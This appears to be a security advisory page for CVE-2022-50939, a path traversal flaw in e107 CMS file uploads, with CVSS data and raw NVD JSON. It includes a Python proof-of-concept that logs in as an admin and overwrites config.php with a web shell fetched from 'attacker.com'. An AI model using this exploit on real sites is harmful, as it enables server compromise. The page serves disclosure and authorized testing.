Security Vulnerability Report
中文
CVE-2022-50939 CVSS 7.2 HIGH

CVE-2022-50939

Published: 2026-01-13 23:15:59
Last Modified: 2026-01-20 18:03:06
Source: [email protected]

Description

e107 CMS version 3.2.1 contains a critical file upload vulnerability that allows authenticated administrators to override arbitrary server files through path traversal. The vulnerability exists in the Media Manager's remote URL upload functionality (image.php) where the upload_caption parameter is not properly sanitized. An attacker with administrative privileges can use directory traversal sequences (../../../) in the upload_caption field to overwrite critical system files outside the intended upload directory. This can lead to complete compromise of the web application by overwriting configuration files, executable scripts, or other critical system components. The vulnerability was discovered by Hubert Wojciechowski and affects the image.php component in the admin interface.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:e107:e107:3.2.1:*:*:*:*:*:*:* - VULNERABLE
e107 CMS <= 3.2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import re # CVE-2022-50939 PoC - e107 CMS Path Traversal File Upload # Target: e107 CMS <= 3.2.1 # Component: image.php Media Manager Remote URL Upload TARGET_URL = "http://target.com/e107_admin/image.php" LOGIN_URL = "http://target.com/e107_admin/admin.php" USERNAME = "admin" PASSWORD = "admin123" def exploit(): """ Authenticate and exploit path traversal in upload_caption parameter to overwrite arbitrary files on the server. """ session = requests.Session() # Step 1: Login to e107 CMS admin panel login_data = { "username": USERNAME, "password": PASSWORD, "authname": "admin", "userlogin": "in" } login_resp = session.post(LOGIN_URL, data=login_data) if "e107.admin" not in login_resp.url: print("[-] Login failed") return False print("[+] Login successful") # Step 2: Exploit path traversal via upload_caption parameter # Target: ../../../e107_files/config.php exploit_data = { "upload_caption": "../../../../e107_files/config.php", "file_url": "http://attacker.com/shell.php", "upload": "Upload" } # Note: Actual request requires proper CSRF token and session cookies # The upload_caption parameter allows path traversal to overwrite files exploit_resp = session.post(TARGET_URL, data=exploit_data) if exploit_resp.status_code == 200: print("[+] Exploit sent - check if config.php was overwritten") return True if __name__ == "__main__": exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50939", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:59.233", "lastModified": "2026-01-20T18:03:06.060", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "e107 CMS version 3.2.1 contains a critical file upload vulnerability that allows authenticated administrators to override arbitrary server files through path traversal. The vulnerability exists in the Media Manager's remote URL upload functionality (image.php) where the upload_caption parameter is not properly sanitized. An attacker with administrative privileges can use directory traversal sequences (../../../) in the upload_caption field to overwrite critical system files outside the intended upload directory. This can lead to complete compromise of the web application by overwriting configuration files, executable scripts, or other critical system components. The vulnerability was discovered by Hubert Wojciechowski and affects the image.php component in the admin interface."}, {"lang": "es", "value": "e107 CMS versión 3.2.1 contiene una vulnerabilidad crítica de carga de archivos que permite a los administradores autenticados sobrescribir archivos arbitrarios del servidor a través de salto de ruta. La vulnerabilidad existe en la funcionalidad de carga de URL remota del Administrador de Medios (image.PHP) donde el parámetro upload_caption no se sanitiza correctamente. Un atacante con privilegios administrativos puede usar secuencias de salto de directorio (../../../) en el campo upload_caption para sobrescribir archivos críticos del sistema fuera del directorio de carga previsto. Esto puede llevar a un compromiso completo de la aplicación web al sobrescribir archivos de configuración, scripts ejecutables u otros componentes críticos del sistema. La vulnerabilidad fue descubierta por Hubert Wojciechowski y afecta al componente image.PHP en la interfaz de administración."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-434"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:e107:e107:3.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "B1CF95DE-65CF-490D-9817-616CF704B16B"}]}]}], "references": [{"url": "https://e107.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://e107.org/download", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/50910", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/e-cms-upload-restriction-bypass-with-path-traversal-file-override", "source": "[email protected]", "tags": ["Th ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.